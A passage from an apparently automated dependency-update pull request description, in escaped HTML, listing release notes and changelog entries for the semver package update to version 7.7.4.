href=\"https://github.com/ai/nanoid/compare/3.1.12...3.1.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `semver` from 5.7.1 to 7.7.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/npm/node-semver/releases\"\u003esemver's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.7.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.3...v7.7.4\"\u003e7.7.4\u003c/a\u003e (2026-01-16)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/a29faa5f3309a01c8e5aeb965fb5c02c4c4e80e2\"\u003e\u003ccode\u003ea29faa5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/835\"\u003e#835\u003c/a\u003e cli: pass options to semver.valid() for loose version validation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/835\"\u003e#835\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/1d28d5e82de16163daf721a7c76fff93e0d333ab\"\u003e\u003ccode\u003e1d28d5e\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/836\"\u003e#836\u003c/a\u003e fix typos and update -n CLI option documentation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/836\"\u003e#836\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/120968b76760cb0db85a72bde2adedd0e9628793\"\u003e\u003ccode\u003e120968b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/840\"\u003e#840\u003c/a\u003e \u003ccode\u003e@npmcli/template-oss@4.29.0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/840\"\u003e#840\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/44d7130c60cedd3703048aa671bb1d659b79ab07\"\u003e\u003ccode\u003e44d7130\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/824\"\u003e#824\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 5.1.0 to 6.0.0 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/824\"\u003e#824\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/70735767b68a1775eb67ac816b183b4a422101f4\"\u003e\u003ccode\u003e7073576\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/820\"\u003e#820\u003c/a\u003e reorder parameters in invalid-versions.js test (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/820\"\u003e#820\u003c/a\u003e) (\u003ca href=\"https://github.com/reggi\"\u003e\u003ccode\u003e@​reggi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/5816d4cfd6d85169527a2bc22fbd5bf4c64f34e3\"\u003e\u003ccode\u003e5816d4c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/829\"\u003e#829\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.28.0 to 4.28.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/829\"\u003e#829\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.2...v7.7.3\"\u003e7.7.3\u003c/a\u003e (2025-10-06)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/e37e0ca0b5fc910d2b1948d25dbc83cc3a0921ea\"\u003e\u003ccode\u003ee37e0ca\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/813\"\u003e#813\u003c/a\u003e faster paths for compare (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/813\"\u003e#813\u003c/a\u003e) (\u003ca href=\"https://github.com/H4ad\"\u003e\u003ccode\u003e@​H4ad\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2471d7543e2e63d9d95358e2405e7e1cde926c36\"\u003e\u003ccode\u003e2471d75\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/811\"\u003e#811\u003c/a\u003e x-range build metadata support (i529015)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8f05c87f56a4123259b8c6d9324f53eadb02e48f\"\u003e\u003ccode\u003e8f05c87\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/807\"\u003e#807\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.25.0 to 4.25.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/owlstronaut\"\u003e\u003ccode\u003e@​owlstronaut\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.1...v7.7.2\"\u003e7.7.2\u003c/a\u003e (2025-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/fcafb61ed566ff8ccf24818dd94b76738f037aa4\"\u003e\u003ccode\u003efcafb61\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/780\"\u003e#780\u003c/a\u003e add missing \u003ccode\u003e'use strict'\u003c/code\u003e directives (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/780\"\u003e#780\u003c/a\u003e) (\u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c99f336fa3bdff465652f9041eab2127d2f52eb2\"\u003e\u003ccode\u003ec99f336\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/781\"\u003e#781\u003c/a\u003e prerelease identifier starting with digits (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/781\"\u003e#781\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c760403b935d3ad35f83e9bbe5ebe1badef2fc71\"\u003e\u003ccode\u003ec760403\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/784\"\u003e#784\u003c/a\u003e template-oss-apply for workflow permissions (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/784\"\u003e#784\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2677f2a88334b0e728dbfe9ad9f5f57458437c87\"\u003e\u003ccode\u003e2677f2a\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/778\"\u003e#778\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.6 to 4.24.3 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/778\"\u003e#778\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.0...v7.7.1\"\u003e7.7.1\u003c/a\u003e (2025-02-03)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/af761c05bd53eef83b5e20f8b09360b0e70557dc\"\u003e\u003ccode\u003eaf761c0\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/764\"\u003e#764\u003c/a\u003e inc: fully capture prerelease identifier (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/764\"\u003e#764\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.6.3...v7.7.0\"\u003e7.7.0\u003c/a\u003e (2025-01-29)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0864b3ce7932667013e0c7c5ec764777d4682883\"\u003e\u003ccode\u003e0864b3c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/753\"\u003e#753\u003c/a\u003e add \u0026quot;release\u0026quot; inc type (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/753\"\u003e#753\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/d588e3782864b1cab2fe9f2452b848e8c7f609d1\"\u003e\u003ccode\u003ed588e37\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/755\"\u003e#755\u003c/a\u003e diff: fix prerelease to stable version diff logic (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/755\"\u003e#755\u003c/a\u003e) (\u003ca href=\"https://github.com/eminberkayd\"\u003e\u003ccode\u003e@​eminberkayd\u003c/code\u003e\u003c/a\u003e, berkay.daglar)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8a34bdecc783407f4e1a8a1ee1f67906b84a4b78\"\u003e\u003ccode\u003e8a34bde\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/754\"\u003e#754\u003c/a\u003e add identifier validation to \u003ccode\u003einc()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/754\"\u003e#754\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/67e54785a0f871361230f84323cbb631b9b6d834\"\u003e\u003ccode\u003e67e5478\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/756\"\u003e#756\u003c/a\u003e readme: added missing period for consistency (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/756\"\u003e#756\u003c/a\u003e) (\u003ca href=\"https://github.com/shaymolcho\"\u003e\u003ccode\u003e@​shaymolcho\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/868d4bbe3d318c52544f38d5f9977a1103e924c2\"\u003e\u003ccode\u003e868d4bb\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/749\"\u003e#749\u003c/a\u003e clarify comment about obsolete prefixes (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/749\"\u003e#749\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/ljharb\"\u003e\u003ccode\u003e@​ljharb\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/145c554b8c7b7ecfcb451153ad18bdb2f24ad10d\"\u003e\u003ccode\u003e145c554\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/741\"\u003e#741\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 4.0.5 to 5.0.0 (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/753e02b9d0cb3ac23e085dc33efcab3e08d61f2b\"\u003e\u003ccode\u003e753e02b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/747\"\u003e#747\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.3 to 4.23.4 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/747\"\u003e#747\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0b812d5fb5fbb208e89dc1250e2efafeaa549437\"\u003e\u003ccode\u003e0b812d5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/744\"\u003e#744\u003c/a\u003e postinstall for dependabot template-oss PR (\u003ca href=\"https://github.com/hashtagchris\"\u003e\u003ccode\u003e@​hashtagchris\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/npm/node-semver/blob/main/CHANGELOG.md\"\u003esemver's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.3...v7.7.4\"\u003e7.7.4\u003c/a\u003e (2026-01-16)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/a29faa5f3309a01c8e5aeb965fb5c02c4c4e80e2\"\u003e\u003ccode\u003ea29faa5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/835\"\u003e#835\u003c/a\u003e cli: pass options to semver.valid() for loose version validation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/835\"\u003e#835\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/1d28d5e82de16163daf721a7c76fff93e0d333ab\"\u003e\u003ccode\u003e1d28d5e\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/836\"\u003e#836\u003c/a\u003e fix typos and update -n CLI option documentation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/836\"\u003e#836\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/120968b76760cb0db85a72bde2adedd0e9628793\"\u003e\u003ccode\u003e120968b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/840\"\u003e#840\u003c/a\u003e \u003ccode\u003e@npmcli/template-oss@4.29.0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/840\"\u003e#840\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/44d7130c60cedd3703048aa671bb1d659b79ab07\"\u003e\u003ccode\u003e44d7130\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/824\"\u003e#824\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 5.1.0 to 6.0.0 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/824\"\u003e#824\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/70735767b68a1775eb67ac816b183b4a422101f4\"\u003e\u003ccode\u003e7073576\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/820\"\u003e#820\u003c/a\u003e reorder parameters in invalid-versions.js test (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/820\"\u003e#820\u003c/a\u003e) (\u003ca href=\"https://github.com/reggi\"\u003e\u003ccode\u003e@​reggi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/5816d4cfd6d85169527a2bc22fbd5bf4c64f34e3\"\u003e\u003ccode\u003e5816d4c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/829\"\u003e#829\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.28.0 to 4.28.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/829\"\u003e#829\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.2...v7.7.3\"\u003e7.7.3\u003c/a\u003e (2025-10-06)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/e37e0ca0b5fc910d2b1948d25dbc83cc3a0921ea\"\u003e\u003ccode\u003ee37e0ca\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/813\"\u003e#813\u003c/a\u003e faster paths for compare (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/813\"\u003e#813\u003c/a\u003e) (\u003ca href=\"https://github.com/H4ad\"\u003e\u003ccode\u003e@​H4ad\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2471d7543e2e63d9d95358e2405e7e1cde926c36\"\u003e\u003ccode\u003e2471d75\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/811\"\u003e#811\u003c/a\u003e x-range build metadata support (i529015)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8f05c87f56a4123259b8c6d9324f53eadb02e48f\"\u003e\u003ccode\u003e8f05c87\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/807\"\u003e#807\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.25.0 to 4.25.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/owlstronaut\"\u003e\u003ccode\u003e@​owlstronaut\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.1...v7.7.2\"\u003e7.7.2\u003c/a\u003e (2025-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/fcafb61ed566ff8ccf24818dd94b76738f037aa4\"\u003e\u003ccode\u003efcafb61\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/780\"\u003e#780\u003c/a\u003e add missing \u003ccode\u003e'use strict'\u003c/code\u003e directives (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/780\"\u003e#780\u003c/a\u003e) (\u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c99f336fa3bdff465652f9041eab2127d2f52eb2\"\u003e\u003ccode\u003ec99f336\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/781\"\u003e#781\u003c/a\u003e prerelease identifier starting with digits (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/781\"\u003e#781\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c760403b935d3ad35f83e9bbe5ebe1badef2fc71\"\u003e\u003ccode\u003ec760403\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/784\"\u003e#784\u003c/a\u003e template-oss-apply for workflow permissions (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/784\"\u003e#784\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2677f2a88334b0e728dbfe9ad9f5f57458437c87\"\u003e\u003ccode\u003e2677f2a\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/778\"\u003e#778\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.6 to 4.24.3 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/778\"\u003e#778\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.0...v7.7.1\"\u003e7.7.1\u003c/a\u003e (2025-02-03)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/af761c05bd53eef83b5e20f8b09360b0e70557dc\"\u003e\u003ccode\u003eaf761c0\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/764\"\u003e#764\u003c/a\u003e inc: fully capture prerelease identifier (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/764\"\u003e#764\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.6.3...v7.7.0\"\u003e7.7.0\u003c/a\u003e (2025-01-29)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0864b3ce7932667013e0c7c5ec764777d4682883\"\u003e\u003ccode\u003e0864b3c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/753\"\u003e#753\u003c/a\u003e add \u0026quot;release\u0026quot; inc type (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/753\"\u003e#753\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/d588e3782864b1cab2fe9f2452b848e8c7f609d1\"\u003e\u003ccode\u003ed588e37\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/755\"\u003e#755\u003c/a\u003e diff: fix prerelease to stable version diff logic (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/755\"\u003e#755\u003c/a\u003e) (\u003ca href=\"https://github.com/eminberkayd\"\u003e\u003ccode\u003e@​eminberkayd\u003c/code\u003e\u003c/a\u003e, berkay.daglar)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8a34bdecc783407f4e1a8a1ee1f67906b84a4b78\"\u003e\u003ccode\u003e8a34bde\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/754\"\u003e#754\u003c/a\u003e add identifier validation to \u003ccode\u003einc()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/754\"\u003e#754\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/67e54785a0f871361230f84323cbb631b9b6d834\"\u003e\u003ccode\u003e67e5478\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github....\n\n_Description has been 